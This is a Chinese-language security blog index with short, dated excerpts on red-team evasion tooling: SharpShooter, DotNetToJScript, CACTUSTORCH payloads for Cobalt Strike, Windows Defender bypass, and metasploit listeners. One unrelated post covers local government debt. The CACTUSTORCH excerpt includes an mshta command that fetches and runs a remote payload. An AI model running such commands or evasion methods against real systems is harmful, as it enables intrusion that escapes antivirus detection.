黑客学徒日记-SharpShooter SharpShooter 神枪手 就是今天要讲的这款工具。 sharp 还可以联想到意味着CSharp这个语言、.net框架 shooter意味着射手、payload发射 在2017年,我们讨论了DotNetToJScript 并且发布了一款工具:CACTUSTORCH 。这个工具是一个poc,并且不免杀,我们不建议在实战中使用。但是这个工具的原理仍然是优秀的,我们重新修改并发布了一款更好的工具 2022-05-17 evasion
黑客学徒日记-windowsDefender自动化bypass Here's something encrypted, password is required to continue reading. 2022-05-16 evasion
cs插件-CACTUSTORCH CACTUSTORCH是payload生成器,可以生成以下这些格式的payload。 VBSVBAJSJSEWSFHTAVBE 使用方法如果不会添加cs插件的可以看看这个视频:CobaltStrike的插件(八) mshta.exe http://192.168.18.30/a amsi bypass插件 总结CACTUSTORCH是一个五年前的工具。 amsi bypass是一个四年前的工 2022-05-13 tools
黑客学徒日记-DotNetToJScript与cs上线 黑客圈和娱乐圈是相反的,在大多数情况下,当你像怪狗一样出名、甚至上了电视的时候,那你的问题就大了。 上一篇中介绍了两个项目,DotNetToJScript 和 UnmanagedPowerShell 让我们能够将.net程序转换为jscript,并且不使用powershell进程就能执行ps命令。 生成DotNetToJScript vba payload在之前的迭代中,当我们生成 JScrip 2022-05-11 tools evasion
黑客学徒日记-DotNetToJScript 在2017年,google项目Zero的研究员James发布了一个很棒的工具DotNetToJScript。如果你不知道,它介绍了一种反射式加载.net程序集的方法,使用了windows原生api例如客户端JScript、VBScript。从攻击者的角度来说,它打开了一个获得代码执行的新的大门,尤其是在受限环境当中。 3年过去了,许多传统杀软厂商能够检测到DotNetToJScirpt的paylo 2022-05-09 tools evasion
安全研究-免杀自动化 第一步 调研阶段 40%达成的目标: 研究veil-evasion 工具生成免杀木马的原理 研究cuiri 工具生成免杀木马的原理 总结出一般规律、可能会遇到的坑、需要花费的时间 研究DotNetToJScript 的原理 研究CACTUSTORCH 的原理 第一阶段结束会确定程序完成的时间。 第二步 写demo阶段 30%目标: 【功能简陋、确保无bug、程序能跑通】静态+动态过windo 2022-05-07 experience
地方债务地雷 我们一直以来都在趟过地雷阵。接下来我们了解一下地雷阵隐患到底是什么。 地方债务问题江苏徐州丰县地方债高达123亿,债务率373%已爆表 丰县2021年的财政收入为33亿元,但其地方债高达123亿元。2021年丰县的债务率为373%。其中,其近3年的城投债高达70亿元。 第七次人口普查数据显示,截至2020年11月1日零时,丰县常住人口为 93.52万人,10年间减少了2.8万余人。 男女比例上,丰 2022-05-07 View
metasploit监听器 上一篇:msfvenom-生成攻击载荷-命令速查 msf监听器,也就是exploit/multi/handler模块 rc文件使用rc文件是metasploit可以调用的脚本文件。将要执行的命令写入到每一行,就可以用 msfconsole -r xx.rc来运行,xx.rc是脚本文件的名称,可以自定义,但是后缀要是rc 自动运行任务AutoRunScript可以在监听器获取到连接后自动运行任务,例 2022-05-05 tools